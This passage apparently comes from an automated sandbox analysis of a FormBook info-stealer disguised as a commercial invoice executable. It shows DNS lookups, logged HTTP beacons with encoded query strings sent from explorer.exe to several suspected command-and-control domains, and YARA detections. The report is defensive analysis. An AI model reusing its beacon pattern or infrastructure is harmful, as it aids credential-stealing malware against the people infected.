                                                Jan 14, 2022 10:21:35.373434067 CET8.8.8.8192.168.2.40x4541No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:35.373434067 CET8.8.8.8192.168.2.40x4541No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:35.373434067 CET8.8.8.8192.168.2.40x4541No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:35.373434067 CET8.8.8.8192.168.2.40x4541No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:35.373434067 CET8.8.8.8192.168.2.40x4541No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:35.373434067 CET8.8.8.8192.168.2.40x4541No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:35.373434067 CET8.8.8.8192.168.2.40x4541No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:41.025860071 CET8.8.8.8192.168.2.40x9d14No error (0)www.friendschance.com118.67.131.217A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:46.896753073 CET8.8.8.8192.168.2.40x941fNo error (0)www.sfcshavedice.com199.59.243.200A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:52.688127995 CET8.8.8.8192.168.2.40x126No error (0)www.rxvendorpills.onlinerxvendorpills.onlineCNAME (Canonical name)IN (0x0001)
                                                Jan 14, 2022 10:21:52.688127995 CET8.8.8.8192.168.2.40x126No error (0)rxvendorpills.online2.57.90.16A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:57.898154974 CET8.8.8.8192.168.2.40x9e3bNo error (0)www.ludowinners.onlineludowinners.onlineCNAME (Canonical name)IN (0x0001)
                                                Jan 14, 2022 10:21:57.898154974 CET8.8.8.8192.168.2.40x9e3bNo error (0)ludowinners.online109.106.254.15A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:08.406914949 CET8.8.8.8192.168.2.40xa528No error (0)www.stardomfrokch.xyzparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                Jan 14, 2022 10:22:08.406914949 CET8.8.8.8192.168.2.40xa528No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:08.406914949 CET8.8.8.8192.168.2.40xa528No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:08.406914949 CET8.8.8.8192.168.2.40xa528No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:08.406914949 CET8.8.8.8192.168.2.40xa528No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:08.406914949 CET8.8.8.8192.168.2.40xa528No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:08.406914949 CET8.8.8.8192.168.2.40xa528No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:08.406914949 CET8.8.8.8192.168.2.40xa528No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:13.785531044 CET8.8.8.8192.168.2.40x66fdNo error (0)www.toposales.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                Jan 14, 2022 10:22:13.785531044 CET8.8.8.8192.168.2.40x66fdNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:19.021996975 CET8.8.8.8192.168.2.40xfc88No error (0)www.survival-hunter.com89.17.204.228A (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:24.233356953 CET8.8.8.8192.168.2.40x4a3aName error (3)www.cloudtotaal.comnonenoneA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:31.391388893 CET8.8.8.8192.168.2.40x80efServer failure (2)www.moldluck.comnonenoneA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:32.377043009 CET8.8.8.8192.168.2.40x80efServer failure (2)www.moldluck.comnonenoneA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:33.484662056 CET8.8.8.8192.168.2.40x80efServer failure (2)www.moldluck.comnonenoneA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:41.439188004 CET8.8.8.8192.168.2.40xd029No error (0)www.laraful.comlaraful.comCNAME (Canonical name)IN (0x0001)
                                                Jan 14, 2022 10:22:41.439188004 CET8.8.8.8192.168.2.40xd029No error (0)laraful.com34.102.136.180A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.answertitles.com
                                                • www.friendschance.com
                                                • www.sfcshavedice.com
                                                • www.rxvendorpills.online
                                                • www.ludowinners.online
                                                • www.stardomfrokch.xyz
                                                • www.toposales.com
                                                • www.survival-hunter.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.449772198.54.117.21180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 14, 2022 10:21:35.543859005 CET2215OUTGET /igwa/?JXRL2Htp=zipQeNKESZPqCbLQlDCLj4zpqFgOpmaVmA6du1Oyf7pRL9Y+oEdiiyDWqjEEpcoXahJo&2dyD8R=k0GL HTTP/1.1
                                                Host: www.answertitles.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.449774118.67.131.21780C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 14, 2022 10:21:41.402209044 CET2288OUTGET /igwa/?JXRL2Htp=kcJK5GFpDKPtevBg1nN4AS2uwE6IDbqQL9Esa69lHd4fhlo3nfdugBZ3P+KHWdbb77iO&2dyD8R=k0GL HTTP/1.1
                                                Host: www.friendschance.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 14, 2022 10:21:41.784310102 CET2337INHTTP/1.1 302 Found
                                                Date: Fri, 14 Jan 2022 09:21:41 GMT
                                                P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
                                                Location: /
                                                Content-Length: 0
                                                Content-Type: text/html; charset=euc-kr
                                                Age: 0
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.449799199.59.243.20080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 14, 2022 10:21:47.487639904 CET3014OUTGET /igwa/?JXRL2Htp=iLZ1RFWiw0U4S9E0pDZlJcjoptUhYXlNWk90HzYHcuVmRCYph1Gowzt+bYvcpjSVMV+b&2dyD8R=k0GL HTTP/1.1
                                                Host: www.sfcshavedice.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 14, 2022 10:21:47.595983028 CET3015INHTTP/1.1 200 OK
                                                Server: openresty
                                                Date: Fri, 14 Jan 2022 09:21:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: parking_session=a4e1e271-0068-5577-22f6-a346186a5cf1; expires=Fri, 14-Jan-2022 09:36:47 GMT; Max-Age=900; path=/; HttpOnly
                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nX2Kcn56V2Sz7grSVWKurQf0CsgpGLUP6hlKe7ICcjcDdPbUB1bEJDo5qxAmJ9vhByZ21DkHs+CZuvQiBs97PQ==
                                                Cache-Control: no-cache
                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                Cache-Control: no-store, must-revalidate
                                                Cache-Control: post-check=0, pre-check=0
                                                Pragma: no-cache
                                                Data Raw: 35 38 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 58 32 4b 63 6e 35 36 56 32 53 7a 37 67 72 53 56 57 4b 75 72 51 66 30 43 73 67 70 47 4c 55 50 36 68 6c 4b 65 37 49 43 63 6a 63 44 64 50 62 55 42 31 62 45 4a 44 6f 35 71 78 41 6d 4a 39 76 68 42 79 5a 32 31 44 6b 48 73 2b 43 5a 75 76 51 69 42 73 39 37 50 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c
                                                Data Ascii: 585<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nX2Kcn56V2Sz7grSVWKurQf0CsgpGLUP6hlKe7ICcjcDdPbUB1bEJDo5qxAmJ9vhByZ21DkHs+CZuvQiBs97PQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.4498142.57.90.1680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 14, 2022 10:21:52.729005098 CET10412OUTGET /igwa/?JXRL2Htp=pt5DjHHXKdbYY+ulYudT7OdutHPMSBHvoYqZ/+0K/RDZ4aBmJwtpu5HKuc6CLarugF7n&2dyD8R=k0GL HTTP/1.1
                                                Host: www.rxvendorpills.online
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 14, 2022 10:21:52.765479088 CET10412INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 14 Jan 2022 09:21:52 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.449815109.106.254.1580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 14, 2022 10:21:58.063568115 CET10413OUTGET /igwa/?JXRL2Htp=P7cOGMhGan+iOds35nuUwcQL6AiWu3hpp80V2Eae8ndsAihNyn6owzlv0a79YI8S4Mj0&2dyD8R=k0GL HTTP/1.1
                                                Host: www.ludowinners.online
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 14, 2022 10:21:58.224889040 CET10415INHTTP/1.1 404 Not Found
                                                Connection: close
                                                content-type: text/html
                                                last-modified: Fri, 26 Mar 2021 09:43:38 GMT
                                                etag: "999-605dacca-1fd7389c82cb2d72;;;"
                                                accept-ranges: bytes
                                                content-length: 2457
                                                date: Fri, 14 Jan 2022 09:21:58 GMT
                                                server: LiteSpeed
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65
                                                Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.449817198.54.117.21180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 14, 2022 10:22:08.576967955 CET11071OUTGET /igwa/?JXRL2Htp=fxfNgp9ZS8bh2/dcez9r/a5fPpTZli2HVK4HIQKX3jCJ31NosuhFm2CAaUmyjrkPXZG7&2dyD8R=k0GL HTTP/1.1
                                                Host: www.stardomfrokch.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.44983923.227.38.7480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 14, 2022 10:22:13.804749966 CET11120OUTGET /igwa/?JXRL2Htp=ma6dGeieA/uMuLPHhGmEMO0MhvgJCSwWTtOunmNNbuA50fkYJarGKThxl5bT79VqZFZn&2dyD8R=k0GL HTTP/1.1
                                                Host: www.toposales.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 14, 2022 10:22:13.878469944 CET11123INHTTP/1.1 403 Forbidden
                                                Date: Fri, 14 Jan 2022 09:22:13 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                X-Sorting-Hat-PodId: 162
                                                X-Sorting-Hat-ShopId: 59837907107
                                                X-Dc: gcp-europe-west1
                                                X-Request-ID: aa596adc-d6ad-4249-95ff-1ddd0936ac81
                                                X-XSS-Protection: 1; mode=block
                                                X-Download-Options: noopen
                                                X-Content-Type-Options: nosniff
                                                X-Permitted-Cross-Domain-Policies: none
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 6cd5cc745a4f4eda-FRA
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.44984289.17.204.22880C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 14, 2022 10:22:19.083188057 CET11135OUTGET /igwa/?JXRL2Htp=XkWoyKtjfo1nTXOdSlOCxSRnTVDbDlQTsKZVtKCHx1ue89AIkDfi+mwVckT9NwCZj6NC&2dyD8R=k0GL HTTP/1.1
                                                Host: www.survival-hunter.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 14, 2022 10:22:19.142043114 CET11135INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Fri, 14 Jan 2022 09:22:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 162
                                                Connection: close
                                                Location: https://www.survival-hunter.com/igwa/?JXRL2Htp=XkWoyKtjfo1nTXOdSlOCxSRnTVDbDlQTsKZVtKCHx1ue89AIkDfi+mwVckT9NwCZj6NC&2dyD8R=k0GL
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Start time:10:20:34
                                                Start date:14/01/2022
                                                Path:C:\Users\user\Desktop\commercial invoice_010202201.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\commercial invoice_010202201.exe"
                                                Imagebase:0x400000
                                                File size:244072 bytes
                                                MD5 hash:ACBC7357E4FB7D8D4874ECBEB0C5BD0F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:10:20:36
                                                Start date:14/01/2022
                                                Path:C:\Users\user\Desktop\commercial invoice_010202201.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\commercial invoice_010202201.exe"
                                                Imagebase:0x400000
                                                File size:244072 bytes
                                                MD5 hash:ACBC7357E4FB7D8D4874ECBEB0C5BD0F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
